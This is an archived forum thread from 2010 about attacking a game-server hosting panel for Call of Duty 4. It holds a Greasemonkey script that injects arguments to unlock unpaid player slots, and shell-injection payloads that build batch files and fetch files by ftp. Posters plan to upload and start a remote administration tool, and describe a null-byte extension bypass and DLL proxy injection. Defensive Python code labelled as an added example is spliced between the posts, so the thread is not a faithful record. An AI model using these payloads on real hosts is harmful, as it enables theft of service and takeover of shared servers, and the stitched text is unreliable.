Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 11:27

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 17 posts ] 
 Post subject: Remote Server Command Line Bug
PostPosted: 31 May 2010 15:18 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
Hi!

When I recently bought a CoD4 server, I got access to its control panel, and after one night of playing, I thought of an idea. So I slept the night over, and the next day I got into the control panel, got into the command line manager, and checked what the last command written in the line was (I had problems with rcon stealing, so the server provider set me up with an additional box to set the rcon password in the command line). The last thing written in the line was +map_rotate, and my +set rcon_password was just before it, so I typed in the rcon password setting box: PASSWORD +set sv_maxclients 64
and voila, I saved everything, restarted the server, and I had 64 usable slots, tho I paid for 12 :D

the trick is that if a command is repeated, the one that is stated last will actually take effect

I even wrote a Greasemonkey script as a proof of concept, but I didn't release it anywhere till now (it's nothing special; you will have to adjust it to make it work on your game panel)
script:
Code:
// Greasemonkey proof of concept: adds an input box and a button next to the
// panel's rcon-password field; clicking the button fills that field with the
// password followed by an extra "+set sv_maxclients <n>" argument.
function putValue() {
    // the target textbox had no id, so it is looked up by name
    var TheTextBox = document.getElementsByName("WebGridBuilder$ctl04$ctl01");
    TheTextBox[0].value = 'PASS ' + '+set sv_maxclients ' + oITnew.value;
}

// input box holding the wanted slot count (default 24), inserted before
// the panel's own element
var oITnew = document.createElement("input");
oITnew.setAttribute("value", "24");
var oIT = document.getElementById("WebGridBuilder_ctl04_ctl00");
var oPAR = oIT.parentNode;
oPAR.insertBefore(oITnew, oIT);

// button wired to putValue; the click listener is enough, an onClick
// attribute string would not call the function
var oITnew1 = document.createElement("button");
oITnew1.addEventListener('click', putValue, false);
oITnew1.style.height = "70px";
var oIT1 = document.getElementById("WebGridBuilder_ctl04_ctl00");
var oPAR1 = oIT1.parentNode;
oPAR1.insertBefore(oITnew1, oIT1);



I know it looks awful, but it works just fine.
To make this work, you need to get the elements of the textbox to write to (in my case, the first element didn't have an id, so I had to get it by name)

this SHOULD work with most game panels, except if some have filtering (I doubt it, as I didn't see anyone post this kind of exploit anywhere, tho I could be wrong)

WARNING: your server provider will most likely see that you modified the command line, and suspend your server. USE AT YOUR OWN RISK


 
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 31 May 2010 16:58 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
there is also something that "could" be possible ("could" because maybe some hosters are vulnerable) and is interesting too: command injection

for example:
PASSWORD & ps -aef
PASSWORD && ps -aef
PASSWORD ; ps -aef

(and maybe an additional ; echo in case PASSWORD is used in the middle of the command for launching the server).
where "ps -aef" is only an example of a system command to execute (for Linux, but it's the same on Windows too).
I don't know how these hosters are managed; anyway, the possibility of getting control over the other hosted servers or running a shell and so on is not to be excluded.

only an idea in case someone has not tried it yet.


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 31 May 2010 19:08 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
well, I will try that
but I can take control over the server by simply deleting the game executable, replacing it with, let's say, a remote administration tool, configuring the RAT exe to ignore all the startup commands usually used for normal server starting, and simply renaming my RAT to the original server .exe name; then all that is left to do is execute it
tho there is a slight problem: you can't delete the server .exe, but fortunately the protection is pretty weak, all I have to do is enable the checkbox
did it like this:

Code:
function disableCheck()
{
    // re-enable the checkbox that the panel only greys out client-side
    var e = document.getElementById("CHECKBOXID1");
    e.disabled = false;
    //var z = document.getElementById("CHECKBOXID2");
    //z.disabled = false;
}

disableCheck()


I never actually tested this method, but I have a strong feeling that it would work (as I can delete the server's exe)


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 31 May 2010 22:17 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
Quote:
PASSWORD & ps -aef
PASSWORD && ps -aef
PASSWORD ; ps -aef


Hmm, my hoster is running Windows Server
so I thought that I'd give this a try, and as I don't know much about those commands, I googled it (Google is probably my best friend) and came to information on Unix servers, and here is where I came to a stall

this is my command line:
Code:
+set fs_savepath D:\UserFiles\K9372\GameServers\TC27072318654272127623234\ +set dedicated 2 +set net_ip XXX.XXX.XXX.XXX +set net_port 28960 +set sv_maxclients 12  +set fs_game "mods/promodlive204" +set sv_punkbuster 1  +exec server.cfg  +set rcon_password XXX >><<  +map_rotate 

X replaces sensitive data
>><< is the place where I can "inject" commands, so the line modified for 64 users would look like this:
Code:
+set fs_savepath D:\UserFiles\K9372\GameServers\TC27072318654272127623234\ +set dedicated 2 +set net_ip XXX.XXX.XXX.XXX +set net_port 28960 +set sv_maxclients 12  +set fs_game "mods/promodlive204" +set sv_punkbuster 1  +exec server.cfg  +set rcon_password XXX +set sv_maxclients 64  +map_rotate 


now, I'm not really sure how the command line would look when I put PASSWORD & ps -aef in,
as I don't get what PASSWORD actually is, and what ps -aef stands for
I'm sorry if I'm bothering you; this isn't really important to me, it just really bugs me when I leave something half done :-S


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 15:14 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
on Windows obviously you will need to replace ps -aef with another, better command (which is also the same thing you must do on Linux, mine was only an example).
the real difference between Win and Linux is that the "&" symbol, used only on Linux to set the original command in background, on Windows acts just like the "&&" one, which is a concatenation of commands.
for example:
Code:
Z:\>echo first_command && echo second_command
first_command
second_command
so, in conclusion, any command you inject will be executed when the process finishes, so immediately after the server is stopped.

and yes, this "trick" doesn't add anything to the one of substituting the exe, so it's a valid alternative only if the admin can't touch the remote game's executable


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 17:26 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
okay, if I got it right, I would just put
Code:
&& echo any_command

at the end of my command line, regardless of the fact that the game starting arguments are the first commands (and I can't modify them, but I can overwrite them)?

and, for those commands, it would be anything that can be done in the command prompt, for instance:
Code:
&& start notepad
?


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 18:18 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
yeah, so the final "password" you should use would be:
Code:
MYPASSWORD && start notepad && echo list

I have added the final "list" only to avoid having to specify that you must leave an empty space after "echo".
you can also build text files through output redirections and so abuse them for building bat files or lists of commands for ftp (yeah, the ftp client of Windows can be scripted), example:
Code:
MYPASSWORD && echo first command > file.bat && echo second command >> file.bat && echo third command >> file.bat && file.bat && echo list
or
Code:
MYPASSWORD && echo open ftp.openssl.org > ftp.txt && echo anonymous >> ftp.txt && echo anonymous_pass >> ftp.txt && echo get /snapshot/README >> ftp.txt && echo quit >> ftp.txt && ftp -s:ftp.txt && echo list


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 18:33 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
so what I could do would be: just upload a remote administration tool, add:
Code:
MYPASSWORD && start path_to_uploaded_tool && echo list
in the command line, and then I restart the server, and stop it again
if this is correct, I would see my server's IP as a zombie in the RAT client?


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 18:37 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
yes, after having uploaded the RAT server (for example using the ftp example above) it's enough to use that command line you specified to start it.
maybe in some cases it could be necessary to "tune up" a bit the example we showed, but in general it all looks correct


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 18:39 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
thanks for your help
I would try it straight away, but I guess it's not right to take down a server when it's full...
when I think about it, it's full most of the time, so I'll have to test it locally I guess


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 18:45 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
oh, by the way: I can crash all game servers running PunkBuster on that machine, it would go like this:

+set fs_savepath D:\UserFiles\K9372\GameServers\TC27072318654272127623234\

that is the line where my PB save dir is located; I can change it to the same dir as the other PB dirs, and then restart PB on my server multiple times, which would automatically restart the servers which operate with that dir

bah, this bug is full of possible exploits, I may have to write to the hoster to check the filtering of input, but I'll first look at what I can actually do with it


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 07 Jun 2010 17:26 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
I contacted my server provider, and we "kinda" solved the problem: they can't change the panel to filter out things, but they set it up so that whenever server settings change (maxclients, password...) they get a notification, so they can ban the server, or something, I'm not sure yet...
still, that won't stop anyone from rooting the server, as that shouldn't supply them a notification


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 07 Jun 2010 18:51 

Joined: 27 May 2010 19:08
Posts: 23
Can't they just set a max amount of characters?


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 07 Jun 2010 21:22 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
they can do tons of things, but they didn't actually develop the game panel, so they have to tell the dev to fix it, but I highly doubt that they will...
anyways, the best and easiest way would be to filter out additional commands from the input


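The following is an added example (Python), not code from the thread or from any game-panel vendor. It shows the two server-side checks the thread keeps circling back to: rejecting an rcon-password value that carries extra +set commands or shell chaining characters (the &, && and ; variants discussed above), and spotting an already-saved command line in which a cvar is +set twice, so that the engine keeps the last value. The character rules, the build_argv and launch helpers, and the settings dictionary are assumptions; the sample command line is the one posted above, with its XXX placeholders kept. Because Quake-derived engines re-parse their command line and treat any + as the start of a new console command, passing the password as a separate argv element is not enough on its own, which is why the value itself is validated.

```python
# Added example: panel-side validation of an operator-supplied rcon password,
# argv construction without a shell, and detection of duplicated +set cvars.
# Field rules, helper names and the settings dict are assumptions, not a real
# panel's code.
import re
import subprocess

# Allowed shape for a password that is going to land on a command line:
# letters, digits, '_', '-', '.'; length 8..64. Everything else is refused.
_RCON_OK = re.compile(r"^[A-Za-z0-9_\-.]{8,64}$")

# Characters that chain or redirect commands in cmd.exe or a POSIX shell,
# plus NUL and line breaks. None of them belongs in a single argument.
_SHELL_META = set("&|;<>`$()\"'\n\r\x00")


def validate_rcon_password(value: str) -> str:
    """Return the password if it is safe to put on the command line, else raise."""
    if not isinstance(value, str):
        raise ValueError("rcon password must be a string")
    if "+" in value or any(c.isspace() for c in value):
        # whitespace or '+' would let the value grow into extra +set commands
        raise ValueError("rcon password may not contain whitespace or '+'")
    if _SHELL_META & set(value):
        raise ValueError("rcon password contains shell metacharacters")
    if not _RCON_OK.fullmatch(value):
        raise ValueError("rcon password must be 8-64 chars of [A-Za-z0-9_-.]")
    return value


def is_safe_rcon_password(value) -> bool:
    """Boolean form of validate_rcon_password for callers that only need yes/no."""
    try:
        validate_rcon_password(value)
    except ValueError:
        return False
    return True


def build_argv(exe: str, fixed_settings: dict, rcon_password: str) -> list:
    """Build the launcher argv as a list. Each operator-controlled value is one
    list element, so no shell ever re-parses it; the password is validated first."""
    argv = [exe]
    for key, val in fixed_settings.items():
        argv += ["+set", key, str(val)]
    argv += ["+set", "rcon_password", validate_rcon_password(rcon_password)]
    argv.append("+map_rotate")
    return argv


def launch(argv: list) -> subprocess.Popen:
    # shell=False: cmd.exe or sh never see '&&', ';' or '>' in the arguments
    return subprocess.Popen(argv, shell=False)


def duplicate_settings(cmdline: str) -> dict:
    """Report cvars that are +set more than once on a saved command line.
    The engine keeps the last value, so a duplicate is the signature of the
    override the thread describes (sv_maxclients 12 ... sv_maxclients 64).
    Returns {cvar: (first_value, last_value)}."""
    seen, dupes = {}, {}
    for cmd in cmdline.split("+")[1:]:      # each console command starts at a '+'
        parts = cmd.split()
        if len(parts) >= 3 and parts[0] == "set":
            key = parts[1]
            if key in seen:
                dupes[key] = (seen[key], parts[2])
            seen[key] = parts[2]
    return dupes


# The command line posted in the thread (XXX placeholders kept as posted).
SAMPLE_LINE = (
    r'+set fs_savepath D:\UserFiles\K9372\GameServers\TC27072318654272127623234\ '
    '+set dedicated 2 +set net_ip XXX.XXX.XXX.XXX +set net_port 28960 '
    '+set sv_maxclients 12  +set fs_game "mods/promodlive204" +set sv_punkbuster 1  '
    '+exec server.cfg  +set rcon_password XXX +set sv_maxclients 64  +map_rotate '
)
# Same line without the injected override (constructed).
CLEAN_LINE = SAMPLE_LINE.replace("+set sv_maxclients 64  ", "")

if __name__ == "__main__":
    for candidate in ("s3cretPassw0rd", "PASSWORD +set sv_maxclients 64",
                      "PASSWORD && start notepad && echo list"):
        print(repr(candidate), "->", is_safe_rcon_password(candidate))
    print(duplicate_settings(SAMPLE_LINE))   # {'sv_maxclients': ('12', '64')}
    print(build_argv("cod4.exe", {"dedicated": 2, "sv_maxclients": 12}, "s3cretPassw0rd"))
```

duplicate_settings is the cheap audit a provider could run on every saved command line (the notification the hoster set up, as described two posts up, is a manual version of the same idea); it is deliberately line-based and assumes no '+' inside a path value.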
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 07 Jun 2010 21:54 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
Okay, I figured out that I can delete anything from the server, even if they strictly said that it cannot be done

here is their message: Also, game panel system by itself does not allow upload of exe, dll, php, bat and other extension nor delete cod4.exe or other dll, exe files.

that's translated from my language (Google was the core of the translation, but I had to correct a few things; bah, I hate Google, tho it's my best friend :D)

here is the proof that I deleted the .EXE file, only through their own file manager (tho with my assistance :D)

http://img261.imageshack.us/img261/4695/w3spdel.png


 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 08 Jun 2010 21:22 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
Decided to take a good bite at their security :D

So I guess I'll be updating this thread as I find new potential exploits

btw, I warned them about deleting the files, told them how I did it, and they apparently posted a ticket to the gpanel devs, and today they wanted to thank me for letting them know there is a bug, with 2 free extra slots on my server =)

Anyways, I thought that I "scanned" everything well, and that there were no obvious bugs, but I guess I was wrong
With a bit of researching, I came to the idea that I could upload an exe file even if it is blacklisted (yeah, I guess that is the only protection)
so I didn't upload anything, but instead made a new empty file, and saved it as: file.exe%00.txt
as you can see, the null terminator actually makes the blacklist filter fail (not detect that it is actually an exe file)
even if the file manager shows that it is a .txt document, it completely acts like an exe file (can't delete it without the tool, just like I deleted iw3sp.exe, so basically it has all the attributes of an exe file)

I'm still figuring out how this could be exploited (I'm sure it can, almost 96%, hehe)

EDIT: I think that when I try to stream the file, it gets executed, but nothing happens because it is simply a dummy exe
so it won't open as other txt files do (even an empty one) but will instead execute itself, but I doubt this. will see anyways...


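An added example (Python), not code from the thread or from the panel, to make the file.exe%00.txt observation above concrete from the file manager's side: a check that decodes the submitted name and then looks only at the trailing extension accepts it, while the NUL-terminated consumer that eventually stores or opens the file sees a name that stops at the NUL byte. The hardened check below rejects control characters and path characters first and then requires an allowlisted extension. The allowlist contents and helper names are assumptions; the blacklisted extensions are the ones the hoster's message listed.

```python
# Added example: why a trailing-extension blacklist accepts "file.exe%00.txt"
# and a check that does not. Panel internals are assumptions; the blacklist
# is the one quoted from the hoster's message (exe, dll, php, bat).
from urllib.parse import unquote
import unicodedata

BLACKLIST = {".exe", ".dll", ".php", ".bat"}   # what the hoster said is blocked
ALLOWLIST = {".txt", ".cfg", ".png"}            # assumed: what the panel needs


def c_string_view(name: str) -> str:
    """What a NUL-terminated consumer (C runtime, Win32 ANSI APIs) makes of the
    decoded name: everything up to the first NUL byte."""
    return name.split("\x00", 1)[0]


def blacklist_check(submitted: str) -> bool:
    """Reconstructed naive panel logic: decode the form value, take the text
    after the last dot, refuse if it is blacklisted. True means accepted."""
    name = unquote(submitted)
    ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
    return ext not in BLACKLIST


def safe_filename(submitted: str) -> str:
    """Hardened check: decode once, reject control characters (NUL included)
    and anything path-like, normalise, then require an allowlisted extension.
    Returns the name to store, or raises ValueError."""
    name = unquote(submitted)
    if any(ord(c) < 0x20 or c == "\x7f" for c in name):
        raise ValueError("control character in filename")
    if "/" in name or "\\" in name or ".." in name or name.startswith("."):
        raise ValueError("path characters in filename")
    name = unicodedata.normalize("NFC", name)
    if "." not in name:
        raise ValueError("no extension")
    ext = "." + name.rsplit(".", 1)[-1].lower()
    if ext not in ALLOWLIST:
        raise ValueError("extension not allowed: " + ext)
    return name


def is_safe_filename(submitted: str) -> bool:
    """Boolean form of safe_filename."""
    try:
        safe_filename(submitted)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    probe = "file.exe%00.txt"        # the name from the post above
    decoded = unquote(probe)
    print("blacklist accepts:", blacklist_check(probe))       # True
    print("C consumer sees:", c_string_view(decoded))          # file.exe
    print("allowlist accepts:", is_safe_filename(probe))       # False
```

The point of the two-step order in safe_filename is that the extension is only inspected after every byte that could change how a lower layer reads the name has already been refused; an allowlist by itself would still be fooled by a name whose decoded form differs from what the storage layer stores.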
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 14 Jun 2010 15:49 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
if you can't delete/replace the exe, remember that you can always:
- create a proxy dll for injecting your code (for example wsock32.dll)
- if the game supports dll mods (so not VM ones) then you can start your code as a mod


 


